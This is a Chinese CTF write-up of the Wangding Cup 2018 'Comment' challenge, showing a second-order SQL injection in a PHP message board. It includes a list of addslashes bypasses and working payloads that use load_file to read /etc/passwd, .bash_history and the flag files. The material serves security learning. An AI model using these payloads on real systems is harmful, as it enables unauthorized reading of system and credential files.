[网鼎杯 2018]Comment

首先**弱密码登录，是一个类似留言板的界面，考虑二次注入
git源码泄露


这里要恢复一下文件，否则文件内容显示不全

//write_do.php
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

这里的write和comment分别对应发帖和留言界面
可以看到所有参数都进行了addslashes函数处理
正好总结一下绕过addslashes的方式

设置数据库字符为gbk导致宽字节注入
使用icon,mb_convert_encoding转换字符编码函数导致宽字节注入
url解码导致绕过addslashes
base64解码导致绕过addslashes
json编码导致绕过addslashes
没有使用引号保护字符串，直接无视addslashes
使用了stripslashes(去掉了\)
字符替换导致的绕过addslashes
参考
https://bbs.ichunqiu.com/thread-10899-1-1.html

闭合情况如下

insert into comment
       set category = ' ',content=user()，/*',
           content = '*/#',
           bo_id = '$bo_id'";

很明显的二次注入。先addslashes转义存入数据库。再从数据库中查询放入sql语句。没有进行转义注，一开始我在纠结为啥不能直接在发帖页面进行注入，原来是addslashes函数，转义后单引号不能在闭合第一个字段category。
后来我又在纠结comment操作时从board取category的值的时候不是也把单引号取出来了吗，在本地测试了一下

进入数据库后是没有反斜杠的，居然现在这么简单的问题上卡了这么长时间，基础还是不牢，这样comment操作时直接取出单引号就能闭合了

注意#是单行注释

',content=(select(load_file("/etc/passwd"))),/*

接下来读取文件,注意看到/home/www下以bash身份运行

',content=(select(load_file("/home/www/.bash_history"))),/*

',content=(select(load_file("/tmp/html/.DS_Store"))),/*

未显示完全,用hex编码显示

',content=(select hex(load_file("/tmp/html/.DS_Store"))),/*

	',content=(select hex(load_file("/tmp/html/flag_8946e1ff1ee3e40f.php"))),/*

发现flag是假的

	',content=(select hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*

这个才是真的